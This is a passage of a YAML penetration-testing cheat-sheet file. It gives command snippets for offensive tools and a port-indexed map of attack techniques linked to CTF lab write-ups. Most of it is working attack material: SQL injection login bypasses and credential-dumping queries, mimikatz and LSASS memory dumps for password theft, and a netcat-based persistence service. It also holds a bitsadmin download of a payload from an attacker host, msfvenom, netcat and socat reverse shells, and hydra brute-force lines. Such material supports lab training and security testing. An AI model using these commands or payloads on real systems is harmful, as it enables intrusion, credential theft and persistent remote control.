      \ or '1'='1'#\n  admin') or '1'='1'/*\n  1234 ' AND 1=0 UNION ALL SELECT 'admin',\
      \ '81dc9bdb52d04dc20036dbd8313ed055\n  admin\" --\n  admin\" #\n  admin\"/*\n\
      \  admin\" or \"1\"=\"1\n  admin\" or \"1\"=\"1\"--\n  admin\" or \"1\"=\"1\"\
      #\n  admin\" or \"1\"=\"1\"/*\n  admin\"or 1=1 or \"\"=\"\n  admin\" or 1=1\n\
      \  admin\" or 1=1--\n  admin\" or 1=1#\n  admin\" or 1=1/*\n  admin\") or (\"\
      1\"=\"1\n  admin\") or (\"1\"=\"1\"--\n  admin\") or (\"1\"=\"1\"#\n  admin\"\
      ) or (\"1\"=\"1\"/*\n  admin\") or \"1\"=\"1\n  admin\") or \"1\"=\"1\"--\n\
      \  admin\") or \"1\"=\"1\"#\n  admin\") or \"1\"=\"1\"/*\n  1234 \" AND 1=0\
      \ UNION ALL SELECT \"admin\", \"81dc9bdb52d04dc20036dbd8313ed055\nfind a row\
      \ where you can place your output:\n  http://<targetip>/inj.php?id=1 union all\
      \ select 1,2,3,4,5,6,7,8\nget db version:\n  http://<targetip>/inj.php?id=1\
      \ union all select 1,2,3,@@version,5\nget current user:\n  http://<targetip>/inj.php?id=1\
      \ union all select 1,2,3,user(),5\nsee all tables:\n  http://<targetip>/inj.php?id=1\
      \ union all select 1,2,3,table_name,5 from information_schema.tables\nget column\
      \ names for a specified table:\n  http://<targetip>/inj.php?id=1 union all select\
      \ 1,2,3,column_name,5 from information_schema.columns where table_name='users'\n\
      concat user names and passwords:\n  http://<targetip>/inj.php?id=1 union all\
      \ select 1,2,3,concat(name, 0x3a , password),5 from users\nwrite to a file:\n\
      \  http://<targetip>/inj.php?id=1 union all select 1,2,3,\"content\",5 into\
      \ outfile 'outfile'\n"
    description: sql injection
    references:
    - https://pentestlab.blog/2012/12/24/sql-injection-authentication-bypass-cheat-sheet/
  - cli: 'chmod +x /foo/bar

      update-rc.d /foo/bar defaults

      '
    description: startup scripts
    references:
    - https://gist.github.com/AvasDream/47f13a510e543009a50c8241276afc24
  - cli: 'strings

      exiftool

      steghide

      '
    description: stegnography
  - cli: 'prefix: ctrl + b

      toggle logging: prefix + shift + p

      screen cap: prefix + alt + p

      complete history: prefix + alt + shift + p

      '
    description: tmux shortcuts
  - cli: "connect via squid proxy @ 3128/tcp on <targetip>, redirect to ssh service\
      \ on localhost, run a local standalone daemon on <targetport>:\n  proxytunnel\
      \ -p <targetip>:<targetport> -d 127.0.0.1:22 -a 1234\n  ssh john@127.0.0.1 /bin/bash\n\
      \  vim /etc/proxychains.conf\n    http <targetip> <targetport>\n  proxychains\
      \ nmap -sT -p22 <targetip>\n  proxychains ssh <username>@<targetip> /bin/bash\n\
      forward remote port to local address:\n  plink.exe -P 22 -l root -pw \"<password>\"\
      \ -R 445:127.0.0.1:445 <targetip>\n"
    description: tunneling
  - cli: 'net localgroup Users

      net localgroup Administrators

      search dir/s *.doc

      system("start cmd.exe /k $cmd")

      sc create microsoft_update binpath="cmd /K start c:\nc.exe -d <targetip> <targetport>
      -e cmd.exe" start= auto error= ignore /c C:\nc.exe -e c:\windows\system32\cmd.exe
      -vv <targetip> <targetport>

      mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords full"

      procdump.exe -accepteula -ma lsass.exe lsass.dmp

      mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"

      C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp ## for 32 bits

      C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp ## for 64 bits

      bitsadmin /transfer mydownloadjob /download /priority normal http://<attackerip>/payload.exe
      C:\\Users\\%USERNAME%\\AppData\\local\\temp\\payload.exe

      powershell history: type C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

      '
    description: windows useful commands
    references:
    - https://0xdarkvortex.dev/index.php/2018/04/17/31-days-of-oscp-experience/
  tools:
  - cli: "set an upstream proxy within burp:\n  burp > user options > upstream proxy\
      \ > <targetip>:<targetport>\n"
    description: burp
  - cli: 'cewl www.megacorpone.com -m 6 -w /root/newfilelist.txt 2>/dev/null

      '
    description: cewl
  - cli: 'fcrackzip -uDp /usr/share/wordlists/rockyou.txt <file.zip>

      unzip -o -P "password" <file.zip>

      '
    description: fcrackzip
  - cli: "start with /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\
      \ wordlist\nsearch file extension:\n  gobuster -u <targetip> -w /usr/share/seclists/Discovery/Web-Content/common.txt\
      \ -t 80 -a Linux -x txt,php\n  gobuster dir -u http://<targetip>:<targetport>/\
      \ -w /usr/share/seclists/Discovery/Web-Content/common.txt -z -k -l -x \"txt,html,php,asp,aspx,jsp\"\
      \nquick:\n  gobuster -u http://<targetip> -w /usr/share/seclists/Discovery/Web-Content/common.txt\
      \ -t 80 -a Linux\nfull/comprehensive:\n  gobuster -s 200,204,301,302,307,403\
      \ -u http://<targetip> -w /usr/share/seclists/Discovery/Web-Content/big.txt\
      \ -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'\n\
      ippsec:\n  gobuster -u http://<targetip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\
      \ -s 200,204,301,302,307,403 -k -x txt,php,asp\n  gobuster -u http://<targetip>\
      \ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -s 200,204,301,302,307,403\
      \ -k -x sh,pl\ncgi list:\n  /usr/share/seclists/Discovery/Web-Content/CGIs.txt\n"
    description: gobuster
  - cli: 'hashcat -a 0 -m 0 <hash> /usr/share/wordlists/rockyou.txt

      '
    description: hashcat
  - cli: "generic:\n  hydra -ufl /usr/share/wordlists/metasploit/unix_users.txt -P\
      \ /usr/share/wordlists/metasploit/unix_passwords.txt <targetip>\nftp:\n  hydra\
      \ -t 4 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt\
      \ <targetip> ftp\nhttp:\n  hydra -l admin -P /root/ctf_wordlist.txt kioptrix3.com\
      \ http-post-form \"/admin.php:u=^USER^&p=^PASS^&f=login:'Enter your username\
      \ and password to continue'\" -V\nwith cookie:\n  hydra -l user -P /usr/share/wordlists/rockyou.txt\
      \ <targetip> -V http-get '/dir/page.php?name=^USER^&pass=^PASS^&submit=Log In:F=Incorrect:H=Cookie:\
      \ insert stuff here'\npop3:\n  hydra -l root -P /usr/share/wordlists/rockyou.txt\
      \ <targetip> pop3\nrdp:\n  hydra -t 4 -V -l root -P /usr/share/wordlists/rockyou.txt\
      \ rdp://<targetip>\nsmtp:\n  hydra -s 25 -v -V -l root@ucal.local -P /usr/share/wordlists/rockyou.txt\
      \ -t 1 -w 20 -f <targetip> smtp\nssh:\n  hydra -l root -P /usr/share/wordlists/rockyou.txt\
      \ <targetip> ssh\n  hydra -t 4 -L /usr/share/wordlists/rockyou.txt -P /usr/share/wordlists/rockyou.txt\
      \ <targetip> ssh\n  hydra -t 4 -L /usr/share/wordlists/rockyou.txt -p some_passsword\
      \ <targetip> ssh\nwordpress:\n  hydra -l elliot -P ./fsocity.dic <targetip>\
      \ http-post-form \"/wp-login.php:log=elliot&pwd=^PASS^:ERROR\"\n"
    description: hydra
  - cli: "create custom wordlist:\n  john --wordlist=megacorpone-cewl --rules --stdout\
      \ >megacorpone-cewl-jtr\ncrack shadow hashes:\n  unshadow passwd shadow >unshadowed\
      \ ; john --rules --wordlist=/usr/share/wordlists/rockyou.txt unshadowed ; john\
      \ --show unshadowed\ncrack md5 hashes:\n  john --wordlist=/usr/share/wordlists/rockyou.txt\
      \ --format=RAW-MD5 hashes\n"
    description: john
  - cli: "rootkit:\n  https://github.com/PinkP4nther/Pinkit\n"
    description: kernel module
  - cli: 'openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out
      server.crt -subj "/CN=root.kali.pwn" --days 7

      GOOS=windows GOARCH=amd64 go build -ldflags "-X main.url=https://<targetip>:<attackerport>"
      -o merlinagentx64.exe main.go

      go build -o merlinagent.elf main.go

      '
    description: merlin c2 framework
  - cli: 'db_status

      load mimiktaz

      msfconsole -q

      msfdb init

      msfdb start

      search <string>

      set payload windows/x86/meterpreter/reverse_tcp

      set verbose true

      show advanced

      show options

      show payloads

      show targets

      systemctl start postgresql

      systemctl status postgresql

      wdigest

      '
    description: metasploit
  - cli: "linux bind tcp shellcode:\n  msfvenom -p linux/x86/shell_bind_tcp lport=4444\
      \ -f c -b \"\\x00\\x0a\\x0d\\x20\" --platform linux -a x86 -e x86/shikata_ga_nai\n\
      windows reverse tcp shellcode:\n  msfvenom -p windows/shell_reverse_tcp lhost=<targetip>\
      \ lport=<attackerport> -b \"\\x00\\x0a\\x0d\" -f c -a x86 --platform windows\
      \ -e x86/shikata_ga_nai\nrevere tcp shellcode for client-side exploit without\
      \ any encoder:\n  msfvenom -p windows/shell_reverse_tcp lhost=<targetip> lport=<attackerport>\
      \ -f js_le --platform windows -a x86 -e generic/none\nphp reverse meterpreter:\n\
      \  msfvenom -p php/meterpreter/reverse_tcp LHOST=<targetip> LPORT=4<attackerport>\
      \ -f raw -o shell.php\nphp reverse shell:\n  msfvenom -p php/reverse_php LHOST=<targetip>\
      \ LPORT=80 -f raw -o reverse.php\njava war reverse shell:\n  msfvenom -p java/shell_reverse_tcp\
      \ LHOST=<targetip> LPORT=4<attackerport> -f war -o shell.war\nwindows javascript\
      \ reverse shell:\n  msfvenom -p windows/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport>\
      \ -f js_le -e generic/none -n 18\nwindows powershell reverse shell:\n  msfvenom\
      \ -p windows/shell_reverse_tcp LHOST=<targetip> LPORT=4<attackerport> -e x86/shikata_ga_nai\
      \ -i 9 -f psh -o shell.ps1\nlinux reverse tcp shell elf shared object file:\n\
      \  msfvenom -p linux/x86/shell_reverse_tcp -f elf-so lhost=<targetip> lport=<attackerport>\
      \ -o linux-shell-reverse-tcp.so\n"
    description: msfvenom
  - cli: "bind:\n  nc -lvp <attackerport>\nconnect:\n  nc -nv <targetip> <attackerport>\n\
      reverse:\n  nc -e /bin/bash <targetip> <attackerport>\n"
    description: netcat
  - cli: "bruteforce rdp login:\n  ncrack -vv --user administrator -P passwords.txt\
      \ rdp://<targetip>\n"
    description: ncrack
  - cli: 'netdiscover -r 192.168.92.0/24

      '
    description: netdiscover
  - cli: 'nikto -h http://<targetip>

      nikto -C all -h http://IP

      nikto -h <targetip> -useproxy http://<targetip>:3128

      '
    description: nikto
  - cli: "vulners nse script:\n  https://github.com/vulnersCom/nmap-vulners\nsearchsploit-like\
      \ vuln scan:\n  nmap --script vulners --script-args mincvss=5.0 <targetip>\n\
      ping sweep:\n  nmap -sn -oN scan.ping.nmap <targetiprange> ; cat scan.ping.nmap\
      \ | grep Up | cut -d\" \" -f2\nquick tcp:\n  nmap -Pn -n -sC -sV -vv -oN scan.tcp.nmap\
      \ <targetip>\nquick udp:\n  nmap -Pn -n -sU -sV -vv -oN scan.udp.nmap <targetip>\n\
      full/intensive tcp:\n  nmap -Pn -n -sC -sV -p- -vv -oN scan.fulltcp.nmap <targetip>\n\
      full/intensive udp:\n  nmap -Pn -n -sU -sV -p- -vv -oN scan.fulltcp.nmap <targetip>\n\
      smb bruteforce:\n  nmap --script=smb-brute.nse <targetip>\n  nmap -sV -p 445\
      \ --script smb-brute <targetiprange>\n"
    description: nmap
  - cli: 'openssl req -x509 -newkey rsa:4096 -sha256 -nodes -keyout server.key -out
      server.crt -subj "/CN=root.kali.pwn" --days 7 ## create a new x509 certificate
      valid for 7 days

      openssl req -new -key caca.key -out caca.csr ## create a new certificate signing
      request (csr)

      openssl x509 -req -days 365 -in caca.csr -signkey caca.key -out pipi.crt ##
      generate new certificate

      openssl pkcs12 -export -in pipi.crt -inkey caca.key -out pipi.p12 ## generate
      pkcs12 certificate

      '
    description: openssl
    references:
    - https://hipotermia.pw/htb/lacasadepapel
  - cli: 'nmap service scan output -> searchsploit:

      nmap -p- -sV -oX new.xml <attackerip>; searchsploit --nmap new.xml

      '
    description: searchsploit
  - cli: 'socat file:`tty`,raw,echo=0 tcp-listen:<attackerport>

      socat exec:''bash -li'',pty,stderr,setsid,sigint,sane tcp:<attackerip>:<attackerport>

      '
    description: socat
  - cli: "avoid prompts, use defaults:\n  sqlmap --batch\nread http request from a\
      \ text file (request captured from burp, useful for POST requests) and use it\
      \ to start scan:\n  sqlmap -r searchform.txt --dbs --batch\n  sqlmap -r searchform.txt\
      \ -D webapphacking --dump-all --batch\npost requests:\n  sqlmap -u \"http://example.com/\"\
      \ --data \"a=1&b=2&c=3\" -p \"a,b\" --method POST\nintrusive scans:\n  sqlmap\
      \ --level 5 --risk 3\nlist databses:\n  sqlmap -u \"http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos\"\
      \ --dbs\nlist tables within a database:\n  sqlmap -u \"http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos\"\
      \ -D gallery --tables\ndump a table:\n  sqlmap -u \"http://kioptrix3.com/gallery/gallery.php?id=1&sort=photoid#photos\"\
      \ -D gallery -T dev_accounts --dump\nblind sql enumeration:\n  sqlmap -u \"\
      http://<targetip>:<targetport>/index.php\" --forms --dbs\n"
    description: sqlmap
  - cli: 'steghide extract -sf file.jpg

      '
    description: steghide
  - cli: "scan all 64k ports:\n  unicornscan -vmT <targetip>:a\nscan first 1k ports:\n\
      \  unicornscan -vmT <targetip>:p\nscan in udp mode:\n  unicornscan -vmU <targetip>\n"
    description: unicornscan
  - cli: "enumerate directories:\n  wfuzz -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\
      \ \"http://127.0.0.1/index.php?vuln=../FUZZ/file1.php\"\n  wfuzz -w /usr/share/seclists/Discovery/Web-Content/quickhits.txt\
      \ --sc 200 -t 50 http://<targetip>:<targetport>/FUZZ\n  wfuzz -w common.txt\
      \ -w /usr/share/seclists/Discovery/Web-Content/web-mutations.txt --sc 200 -t\
      \ 50 http://<targetip>:4488/FUZZ\nenumerate directories and filter on response\
      \ length:\n  wfuzz -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt\
      \ --hh 158607 http://bart.htb/FUZZ\nbruteforce password:\n  bruteforce a single\
      \ list:\n    wfuzz -w pwds.db -d \"user=pinkadmin&pass=FUZZ&pin=FUZ2Z\" -t 50\
      \ --hw 6 http://<targetip>:<targetport>/login.php\n  bruteforce multiple lists:\n\
      \    wfuzz -w pwds.db -w pins.txt -d \"user=pinkadmin&pass=FUZZ&pin=FUZ2Z\"\
      \ -t 50 --hw 6 http://<targetip>:<targetport>/login.php\n  bruteforce multiple\
      \ lists, but faster:\n    wfuzz -c -z file,./usernames.txt -z file,./pwds.db\
      \ -d 'user=FUZZ&pass=FUZ2Z&pin=12345' --hh 45 http://<targetip>:<targetport>/login.php\n\
      \    wfuzz -c -z file,./pin.txt -d 'user=pinkadmin&pass=AaPinkSecaAdmin4467&pin=FUZZ'\
      \ --hh 45,41 http://<targetip>:<targetport>/login.php\n"
    description: wfuzz
  ttpsitw:
    '10000':
      l4: tcp
      port: '10000'
      protokeys:
      - http/SimpleHTTPServer 0.6 (Python 2.7.3)
      ttps: []
      ttpsitw:
      - exploit_bof
      writeups:
      - name: 'Brainpan: 1'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.brainpan/writeup.pdf
        verbose_id: vulnhub#51
    '111':
      l4: tcp
      port: '111'
      protokeys: []
      ttps:
      - enumerate_proto_nfs
      - enumerate_proto_rpc
      ttpsitw: []
      writeups: []
    '1337':
      l4: tcp
      port: '1337'
      protokeys:
      - http/Apache httpd 2.4.7 ((Ubuntu))
      ttps: []
      ttpsitw:
      - exploit_credsreuse
      - exploit_sqli
      - privesc_kernel_overlayfs
      - privesc_mysql_root
      - privesc_mysql_udf
      writeups:
      - name: 'Lord Of The Root: 1.0.1'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf
        verbose_id: vulnhub#129
    '135':
      l4: tcp
      port: '135'
      protokeys: []
      ttps:
      - enumerate_proto_rpc
      ttpsitw: []
      writeups: []
    '139':
      l4: tcp
      port: '139'
      protokeys:
      - netbios-ssn/Microsoft Windows netbios-ssn
      - 'netbios-ssn/Samba smbd 3.X - 4.X (workgroup: WORKGROUP)'
      ttps:
      - enumerate_app_powershell_history
      - enumerate_proto_smb
      - enumerate_proto_smb_anonymous_access
      - exploit_smb_ms08_067
      - exploit_smb_ms17_010
      ttpsitw:
      - exploit_smb_ms08_067
      - exploit_smb_ms17_010
      - exploit_smb_nullsession
      - exploit_smb_usermap
      - exploit_smb_web_root
      writeups:
      - name: Blue
        url: https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.pdf
        verbose_id: hackthebox#51
      - name: Lame
        url: https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.pdf
        verbose_id: hackthebox#1
      - name: Legacy
        url: https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.pdf
        verbose_id: hackthebox#2
      - name: 'LazySysAdmin: 1'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf
        verbose_id: vulnhub#205
    '1433':
      l4: tcp
      port: '1433'
      protokeys:
      - ms-sql-s/Microsoft SQL Server 14.00.1000.00
      ttps:
      - enumerate_proto_mssql
      - enumerate_proto_sql
      - enumerate_proto_sql_ssis_dtsconfig
      ttpsitw:
      - enumerate_app_powershell_history
      - enumerate_proto_sql
      - enumerate_proto_sql_ssis_dtsconfig
      - exploit_sql_login
      - exploit_sql_xpcmdshell
      writeups:
      - name: Archetype
        url: https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf
        verbose_id: hackthebox#287
    '1521':
      l4: tcp
      port: '1521'
      protokeys: []
      ttps:
      - enumerate_proto_oracle
      - enumerate_proto_postgres
      ttpsitw: []
      writeups: []
    '161':
      l4: tcp
      port: '161'
      protokeys: []
      ttps:
      - enumerate_proto_snmp
      ttpsitw: []
      writeups: []
    '1974':
      l4: tcp
      port: '1974'
      protokeys: []
      ttps: []
      ttpsitw:
      - privesc_cron
      - privesc_setuid
      - privesc_sudoers
      writeups:
      - name: 'Billy Madison: 1.1'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.billymadison1dot1/writeup.pdf
        verbose_id: vulnhub#161
    '2049':
      l4: tcp
      port: '2049'
      protokeys:
      - 'nfs_acl/2-3 (RPC #100227)'
      - 'nfs_acl/3 (RPC #100227)'
      ttps:
      - enumerate_proto_nfs
      ttpsitw:
      - exploit_nfs_rw
      - exploit_ssh_authorizedkeys
      - privesc_docker_group
      - privesc_nfs_norootsquash
      - privesc_strace_setuid
      writeups:
      - name: 'Lin.Security: 1'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf
        verbose_id: vulnhub#244
      - name: 'HackLAB: Vulnix'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf
        verbose_id: vulnhub#48
    '21':
      l4: tcp
      port: '21'
      protokeys:
      - ftp/Microsoft ftpd
      - ftp/vsftpd 2.3.5
      ttps:
      - enumerate_proto_ftp
      ttpsitw:
      - enumerate_proto_ftp
      - exploit_ftp_anonymous
      - exploit_ftp_web_root
      writeups:
      - name: Devel
        url: https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf
        verbose_id: hackthebox#3
      - name: 'BSides Vancouver: 2018 (Workshop)'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf
        verbose_id: vulnhub#231
    '22':
      l4: tcp
      port: '22'
      protokeys:
      - ssh/OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
      - ssh/OpenSSH 5.9p1 Debian 5ubuntu1.10 (Ubuntu Linux; protocol 2.0)
      - ssh/OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
      - ssh/OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
      ttps:
      - enumerate_proto_ssh
      ttpsitw:
      - enumerate_proto_ssh
      - exploit_defaultcreds
      - exploit_ssh_authorizedkeys
      - exploit_ssh_bruteforce
      - privesc_ssh_authorizedkeys
      - privesc_sudo
      - privesc_sudoers
      writeups:
      - name: Mirai
        url: https://github.com/7h3rAm/writeups/blob/master/htb.mirai/writeup.pdf
        verbose_id: hackthebox#64
      - name: 'BSides Vancouver: 2018 (Workshop)'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf
        verbose_id: vulnhub#231
      - name: 'LazySysAdmin: 1'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf
        verbose_id: vulnhub#205
      - name: 'HackLAB: Vulnix'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf
        verbose_id: vulnhub#48
    '23':
      l4: tcp
      port: '23'
      protokeys: []
      ttps:
      - enumerate_proto_telnet
      ttpsitw: []
      writeups: []
    '25':
      l4: tcp
      port: '25'
      protokeys: []
      ttps:
      - enumerate_proto_smtp
      ttpsitw: []
      writeups: []
    '27017':
      l4: tcp
      port: '27017'
      protokeys: []
      ttps:
      - enumerate_app_mongo
      ttpsitw: []
      writeups: []
    '28017':
      l4: tcp
      port: '28017'
      protokeys: []
      ttps:
      - enumerate_app_mongo
      ttpsitw: []
      writeups: []
    '3000':
      l4: tcp
      port: '3000'
      protokeys:
      - http/Node.js Express framework
      ttps: []
      ttpsitw:
      - exploit_credsreuse
      - exploit_mongodb
      - exploit_nodejs
      - privesc_setuid
      writeups:
      - name: 'Node: 1'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.node1/writeup.pdf
        verbose_id: vulnhub#252
    '3232':
      l4: tcp
      port: '3232'
      protokeys: []
      ttps:
      - enumerate_proto_distcc
      ttpsitw: []
      writeups: []
    '3306':
      l4: tcp
      port: '3306'
      protokeys: []
      ttps:
      - enumerate_proto_mysql
      ttpsitw: []
      writeups: []
    '389':
      l4: tcp
      port: '389'
      protokeys: []
      ttps:
      - enumerate_proto_ldap
      ttpsitw: []
      writeups: []
    '443':
      l4: tcp
      port: '443'
      protokeys:
      - ssl/https/Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
      ttps:
      - enumerate_app_apache
      - enumerate_app_apache_tomcat
      - enumerate_app_coldfusion_files
      - enumerate_app_coldfusion_version
      - enumerate_app_drupal
      - enumerate_app_joomla
      - enumerate_app_phpmyadmin
      - enumerate_app_prtg
      - enumerate_app_webmin
      - enumerate_app_wordpress
      - enumerate_proto_http
      - enumerate_proto_webdav
      ttpsitw:
      - exploit_modssl
      - privesc_modssl
      writeups:
      - name: 'Kioptrix: Level 1 (#1)'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix1/writeup.pdf
        verbose_id: vulnhub#22
    '445':
      l4: tcp
      port: '445'
      protokeys:
      - microsoft-ds/Windows Server 2019 Standard 17763 microsoft-ds
      ttps:
      - enumerate_app_powershell_history
      - enumerate_proto_smb
      - enumerate_proto_smb_anonymous_access
      - exploit_smb_ms08_067
      - exploit_smb_ms17_010
      ttpsitw:
      - enumerate_proto_smb
      - enumerate_proto_smb_anonymous_access
      - privesc_psexec_login
      writeups:
      - name: Archetype
        url: https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf
        verbose_id: hackthebox#287
    '53':
      l4: tcp
      port: '53'
      protokeys: []
      ttps:
      - enumerate_proto_dns
      ttpsitw: []
      writeups: []
    '636':
      l4: tcp
      port: '636'
      protokeys: []
      ttps:
      - enumerate_proto_ldap
      ttpsitw: []
      writeups: []
    '6660':
      l4: tcp
      port: '6660'
      protokeys: []
      ttps:
      - enumerate_app_unrealirc
      ttpsitw: []
      writeups: []
    '6661':
      l4: tcp
      port: '6661'
      protokeys: []
      ttps:
      - enumerate_app_unrealirc
      ttpsitw: []
      writeups: []
    '6662':
      l4: tcp
      port: '6662'
      protokeys: []
      ttps:
      - enumerate_app_unrealirc
      ttpsitw: []
      writeups: []
    '6663':
      l4: tcp
      port: '6663'
      protokeys: []
      ttps:
      - enumerate_app_unrealirc
      ttpsitw: []
      writeups: []
    '6664':
      l4: tcp
      port: '6664'
      protokeys: []
      ttps:
      - enumerate_app_unrealirc
      ttpsitw: []
      writeups: []
    '6665':
      l4: tcp
      port: '6665'
      protokeys: []
      ttps:
      - enumerate_app_unrealirc
      ttpsitw: []
      writeups: []
    '6666':
      l4: tcp
      port: '6666'
      protokeys: []
      ttps:
      - enumerate_app_unrealirc
      ttpsitw: []
      writeups: []
    '6667':
      l4: tcp
      port: '6667'
      protokeys: []
      ttps:
      - enumerate_app_unrealirc
      ttpsitw: []
      writeups: []
    '6668':
      l4: tcp
      port: '6668'
      protokeys: []
      ttps:
      - enumerate_app_unrealirc
      ttpsitw: []
      writeups: []
    '6669':
      l4: tcp
      port: '6669'
      protokeys: []
      ttps:
      - enumerate_app_unrealirc
      ttpsitw: []
      writeups: []
    '7000':
      l4: tcp
      port: '7000'
      protokeys: []
      ttps:
      - enumerate_app_unrealirc
      ttpsitw: []
      writeups: []
    '79':
      l4: tcp
      port: '79'
      protokeys: []
      ttps:
      - enumerate_proto_finger
      ttpsitw: []
      writeups: []
    '80':
      l4: tcp
      port: '80'
      protokeys:
      - http/2.4.18 ((Ubuntu))
      - http/Apache httpd
      - http/Apache httpd 2.0.52 ((CentOS))
      - http/Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)
      - http/Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
      - http/Apache httpd 2.2.22 ((Ubuntu))
      - http/Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
      - http/Apache httpd 2.4.18 ((Ubuntu))
      - http/Apache httpd 2.4.25 ((Debian))
      - http/Apache httpd 2.4.29
      - http/Apache httpd 2.4.29 ((Ubuntu))
      - http/Apache httpd 2.4.34 ((Ubuntu))
      - http/Apache httpd 2.4.41 ((Ubuntu))
      - http/Apache httpd 2.4.7 ((Ubuntu))
      - http/HttpFileServer httpd 2.3
      - http/Microsoft IIS httpd 6.0
      - http/Microsoft IIS httpd 7.5
      ttps:
      - enumerate_app_apache
      - enumerate_app_apache_tomcat
      - enumerate_app_coldfusion_files
      - enumerate_app_coldfusion_version
      - enumerate_app_drupal
      - enumerate_app_joomla
      - enumerate_app_phpmyadmin
      - enumerate_app_prtg
      - enumerate_app_webmin
      - enumerate_app_wordpress
      - enumerate_proto_http
      - enumerate_proto_webdav
      ttpsitw:
      - enumerate_app_wordpress
      - enumerate_proto_http
      - exploit_cmdexec
      - exploit_command_injection
      - exploit_credsreuse
      - exploit_hfs_cmd_exec
      - exploit_iis_asp_reverseshell
      - exploit_iis_webdav
      - exploit_lotuscms
      - exploit_pchart
      - exploit_php_fileupload
      - exploit_php_fileupload_bypass
      - exploit_php_reverseshell
      - exploit_python_reverseshell
      - exploit_shellshock
      - exploit_sqli
      - exploit_ssh_privatekeys
      - exploit_wordpress_defaultcreds
      - exploit_wordpress_plugin
      - exploit_wordpress_plugin_activitymonitor
      - exploit_wordpress_plugin_hellodolly
      - exploit_wordpress_template
      - privesc_bash_reverseshell
      - privesc_bof
      - privesc_chkrootkit
      - privesc_credsreuse
      - privesc_cron
      - privesc_cron_rootjobs
      - privesc_env_relative_path
      - privesc_kernel_ipappend
      - privesc_lxc_bash
      - privesc_mysql_creds
      - privesc_mysql_root
      - privesc_mysql_udf
      - privesc_nmap
      - privesc_setuid
      - privesc_shell_escape
      - privesc_sudo
      - privesc_sudoers
      - privesc_windows_ms11_046
      - privesc_windows_ms14_070
      - privesc_windows_ms15_051
      - privesc_windows_ms16_098
      writeups:
      - name: Bashed
        url: https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf
        verbose_id: hackthebox#118
      - name: Blocky
        url: https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf
        verbose_id: hackthebox#48
      - name: CronOS
        url: https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf
        verbose_id: hackthebox#11
      - name: Devel
        url: https://github.com/7h3rAm/writeups/blob/master/htb.devel/writeup.pdf
        verbose_id: hackthebox#3
      - name: Grandpa
        url: https://github.com/7h3rAm/writeups/blob/master/htb.grandpa/writeup.pdf
        verbose_id: hackthebox#13
      - name: Granny
        url: https://github.com/7h3rAm/writeups/blob/master/htb.granny/writeup.pdf
        verbose_id: hackthebox#14
      - name: Optimum
        url: https://github.com/7h3rAm/writeups/blob/master/htb.optimum/writeup.pdf
        verbose_id: hackthebox#6
      - name: Shocker
        url: https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf
        verbose_id: hackthebox#108
      - name: Year of the Fox
        url: https://github.com/7h3rAm/writeups/blob/master/thm.yotf/writeup.pdf
        verbose_id: tryhackme#yotf
      - name: 'BSides Vancouver: 2018 (Workshop)'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf
        verbose_id: vulnhub#231
      - name: 'DC: 6'
        url: https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf
        verbose_id: vulnhub#315
      - name: 'Escalate_Linux: 1'
